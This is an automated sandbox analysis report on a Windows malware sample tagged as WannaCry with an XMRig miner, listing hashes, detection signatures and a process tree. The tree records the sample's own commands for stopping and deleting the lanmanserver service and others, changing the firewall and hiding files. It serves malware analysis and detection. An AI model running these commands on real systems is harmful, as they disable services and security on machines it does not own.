Analysis
-
max time kernel
151s -
max time network
166s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
08-07-2022 01:50
Behavioral task
behavioral1
Sample
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
Resource
win7-20220414-en
General
-
Target
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
-
Size
2.3MB
-
MD5
7b4f33a283fc64db1227f5d82db91a59
-
SHA1
f32ae945c419e09e3320686f2b9b419c346d76a3
-
SHA256
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a
-
SHA512
7c59bc1028115acbda27245a8f14638892a3fbae1ac409ec62448f9ad580fd3051bdaef751b7d8f6e81df80a23098201de386082e229a768a6142a514ee85511
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Detected Stratum cryptominer command 3 IoCs
Looks to be attempting to contact Stratum mining pool.
Processes:
svchost.exesvchost.exeKvMonXP.exepid process 2540 svchost.exe 3048 svchost.exe 1592 KvMonXP.exe -
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1892-55-0x0000000000400000-0x0000000000656000-memory.dmp xmrig \??\c:\windows\Fonts\lsass.exe xmrig C:\Windows\Fonts\lsass.exe xmrig \Windows\Fonts\KvMonXP.exe xmrig C:\Windows\Fonts\KvMonXP.exe xmrig -
Executes dropped EXE 16 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exesvchost.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeKvMonXP.exepid process 1164 svchost.exe 1492 svchost.exe 1868 svchost.exe 664 svchost.exe 880 svchost.exe 1760 lsass.exe 2548 svchost.exe 2564 svchost.exe 2540 svchost.exe 2556 svchost.exe 2776 svchost.exe 3048 svchost.exe 3064 svchost.exe 3056 svchost.exe 2052 svchost.exe 1592 KvMonXP.exe -
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 2616 netsh.exe 2892 netsh.exe 2912 netsh.exe 3008 netsh.exe -
Sets file to hidden 1 TTPs 7 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 3036 attrib.exe 3052 attrib.exe 2472 attrib.exe 2836 attrib.exe 2696 attrib.exe 2512 attrib.exe 2132 attrib.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/1164-113-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1492-114-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1868-115-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/664-116-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/880-132-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/664-134-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1492-135-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1164-139-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx behavioral1/memory/2548-149-0x0000000140000000-0x0000000140053000-memory.dmp upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/2564-152-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2540-153-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2556-154-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/2556-156-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx behavioral1/memory/3056-168-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2052-166-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2540-165-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/3048-170-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1868-171-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/3064-172-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2776-173-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2564-174-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/880-175-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2776-176-0x0000000140000000-0x0000000140053000-memory.dmp upx -
Deletes itself 1 IoCs
Processes:
WScript.exepid process 1336 WScript.exe -
Loads dropped DLL 10 IoCs
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exesvchost.exepid process 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe 2596 2616 2604 2636 772 2132 2112 2056 2776 svchost.exe -
Drops file in Windows directory 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exeattrib.exeattrib.exeattrib.exeattrib.exelsass.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\lsass.exe 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\KvMonXP.exe lsass.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\debug\lsmose.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\tasksche.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\svchost.exe attrib.exe File opened for modification C:\windows\debug\svchost.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\svchost.exe 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2492 sc.exe 2948 sc.exe 1324 sc.exe 2020 sc.exe 2140 sc.exe 2712 sc.exe 3024 sc.exe 1844 sc.exe 1788 sc.exe 2156 sc.exe 1060 sc.exe 1700 sc.exe 1764 sc.exe 1544 sc.exe 2232 sc.exe 1716 sc.exe 1412 sc.exe 1236 sc.exe 2324 sc.exe 1112 sc.exe 2016 sc.exe 360 sc.exe 1716 sc.exe 1264 sc.exe 1956 sc.exe 1580 sc.exe 880 sc.exe 1260 sc.exe 2920 sc.exe 624 sc.exe 772 sc.exe 1888 sc.exe 1544 sc.exe 2340 sc.exe 3000 sc.exe 1792 sc.exe 276 sc.exe 524 sc.exe 2796 sc.exe 520 sc.exe 1800 sc.exe 2220 sc.exe 696 sc.exe 812 sc.exe 2300 sc.exe 2404 sc.exe 1704 sc.exe 2464 sc.exe 2824 sc.exe 2368 sc.exe 1412 sc.exe 1992 sc.exe 2208 sc.exe 2984 sc.exe 1644 sc.exe 1264 sc.exe 1464 sc.exe 2448 sc.exe 848 sc.exe 2892 sc.exe 2880 sc.exe 2936 sc.exe 1724 sc.exe 520 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 23 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 2120 WMIC.exe 2340 WMIC.exe 2332 WMIC.exe 2468 WMIC.exe 2744 WMIC.exe 1444 WMIC.exe 2316 WMIC.exe 2872 WMIC.exe 1524 WMIC.exe 2640 WMIC.exe 2112 WMIC.exe 2212 WMIC.exe 2244 WMIC.exe 2972 WMIC.exe 2232 WMIC.exe 2416 WMIC.exe 2588 WMIC.exe 2636 WMIC.exe 1036 WMIC.exe 2392 WMIC.exe 2728 WMIC.exe 2888 WMIC.exe 1996 WMIC.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1116 taskkill.exe 1804 taskkill.exe 2004 taskkill.exe 1300 taskkill.exe 1792 taskkill.exe 1892 taskkill.exe 2224 taskkill.exe 1932 taskkill.exe 1816 taskkill.exe 1952 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
lsass.exepid process 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe 1760 lsass.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 468 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 1036 WMIC.exe Token: SeSecurityPrivilege 1036 WMIC.exe Token: SeTakeOwnershipPrivilege 1036 WMIC.exe Token: SeLoadDriverPrivilege 1036 WMIC.exe Token: SeSystemProfilePrivilege 1036 WMIC.exe Token: SeSystemtimePrivilege 1036 WMIC.exe Token: SeProfSingleProcessPrivilege 1036 WMIC.exe Token: SeIncBasePriorityPrivilege 1036 WMIC.exe Token: SeCreatePagefilePrivilege 1036 WMIC.exe Token: SeBackupPrivilege 1036 WMIC.exe Token: SeRestorePrivilege 1036 WMIC.exe Token: SeShutdownPrivilege 1036 WMIC.exe Token: SeDebugPrivilege 1036 WMIC.exe Token: SeSystemEnvironmentPrivilege 1036 WMIC.exe Token: SeRemoteShutdownPrivilege 1036 WMIC.exe Token: SeUndockPrivilege 1036 WMIC.exe Token: SeManageVolumePrivilege 1036 WMIC.exe Token: 33 1036 WMIC.exe Token: 34 1036 WMIC.exe Token: 35 1036 WMIC.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 1116 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeIncreaseQuotaPrivilege 1036 WMIC.exe Token: SeSecurityPrivilege 1036 WMIC.exe Token: SeTakeOwnershipPrivilege 1036 WMIC.exe Token: SeLoadDriverPrivilege 1036 WMIC.exe Token: SeSystemProfilePrivilege 1036 WMIC.exe Token: SeSystemtimePrivilege 1036 WMIC.exe Token: SeProfSingleProcessPrivilege 1036 WMIC.exe Token: SeIncBasePriorityPrivilege 1036 WMIC.exe Token: SeCreatePagefilePrivilege 1036 WMIC.exe Token: SeBackupPrivilege 1036 WMIC.exe Token: SeRestorePrivilege 1036 WMIC.exe Token: SeShutdownPrivilege 1036 WMIC.exe Token: SeDebugPrivilege 1036 WMIC.exe Token: SeSystemEnvironmentPrivilege 1036 WMIC.exe Token: SeRemoteShutdownPrivilege 1036 WMIC.exe Token: SeUndockPrivilege 1036 WMIC.exe Token: SeManageVolumePrivilege 1036 WMIC.exe Token: 33 1036 WMIC.exe Token: 34 1036 WMIC.exe Token: 35 1036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe Token: SeShutdownPrivilege 2120 WMIC.exe Token: SeDebugPrivilege 2120 WMIC.exe Token: SeSystemEnvironmentPrivilege 2120 WMIC.exe Token: SeRemoteShutdownPrivilege 2120 WMIC.exe Token: SeUndockPrivilege 2120 WMIC.exe Token: SeManageVolumePrivilege 2120 WMIC.exe Token: 33 2120 WMIC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exelsass.exepid process 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe 1760 lsass.exe 1760 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.execmd.exenet.exenet.exenet.exedescription pid process target process PID 1892 wrote to memory of 688 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 1892 wrote to memory of 688 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 1892 wrote to memory of 688 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 1892 wrote to memory of 688 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 1892 wrote to memory of 1728 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1728 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1728 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1728 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1324 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1324 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1324 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1324 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1264 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1264 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1264 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1264 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1236 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1236 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1236 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1236 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 2028 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 2028 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 2028 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 2028 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 688 wrote to memory of 316 688 cmd.exe attrib.exe PID 688 wrote to memory of 316 688 cmd.exe attrib.exe PID 688 wrote to memory of 316 688 cmd.exe attrib.exe PID 688 wrote to memory of 316 688 cmd.exe attrib.exe PID 1728 wrote to memory of 568 1728 net.exe net1.exe PID 1728 wrote to memory of 568 1728 net.exe net1.exe PID 1728 wrote to memory of 568 1728 net.exe net1.exe PID 1728 wrote to memory of 568 1728 net.exe net1.exe PID 1892 wrote to memory of 520 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 520 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 520 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 520 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 580 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 580 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 580 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 580 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1264 wrote to memory of 1704 1264 net.exe net1.exe PID 1264 wrote to memory of 1704 1264 net.exe net1.exe PID 1264 wrote to memory of 1704 1264 net.exe net1.exe PID 1264 wrote to memory of 1704 1264 net.exe net1.exe PID 2028 wrote to memory of 368 2028 net.exe net1.exe PID 2028 wrote to memory of 368 2028 net.exe net1.exe PID 2028 wrote to memory of 368 2028 net.exe net1.exe PID 2028 wrote to memory of 368 2028 net.exe net1.exe PID 1892 wrote to memory of 1792 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1792 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1792 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1792 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1764 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1764 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1764 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1764 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 1892 wrote to memory of 1956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 1892 wrote to memory of 1956 1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1692 attrib.exe 1712 attrib.exe 2656 attrib.exe 2808 attrib.exe 2864 attrib.exe 2800 attrib.exe 2608 attrib.exe 2360 attrib.exe 1424 attrib.exe 2444 attrib.exe 2528 attrib.exe 700 attrib.exe 1936 attrib.exe 2920 attrib.exe 3044 attrib.exe 1484 attrib.exe 2684 attrib.exe 1372 attrib.exe 1276 attrib.exe 1468 attrib.exe 2472 attrib.exe 2368 attrib.exe 2248 attrib.exe 2964 attrib.exe 1116 attrib.exe 2544 attrib.exe 2420 attrib.exe 2824 attrib.exe 2456 attrib.exe 1668 attrib.exe 2380 attrib.exe 2708 attrib.exe 2988 attrib.exe 2160 attrib.exe 832 attrib.exe 1596 attrib.exe 2212 attrib.exe 2836 attrib.exe 2292 attrib.exe 2612 attrib.exe 1324 attrib.exe 2320 attrib.exe 2700 attrib.exe 2856 attrib.exe 2544 attrib.exe 2052 attrib.exe 2200 attrib.exe 832 attrib.exe 2284 attrib.exe 2512 attrib.exe 2184 attrib.exe 2372 attrib.exe 2344 attrib.exe 2604 attrib.exe 316 attrib.exe 1852 attrib.exe 2600 attrib.exe 3000 attrib.exe 2308 attrib.exe 1300 attrib.exe 2556 attrib.exe 2088 attrib.exe 2720 attrib.exe 2552 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop ServiceSaims2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceSaims3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop ServiceSais2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceSais3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop HostManger2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HostManger3⤵
-
C:\Windows\SysWOW64\sc.exesc delete HostManger2⤵
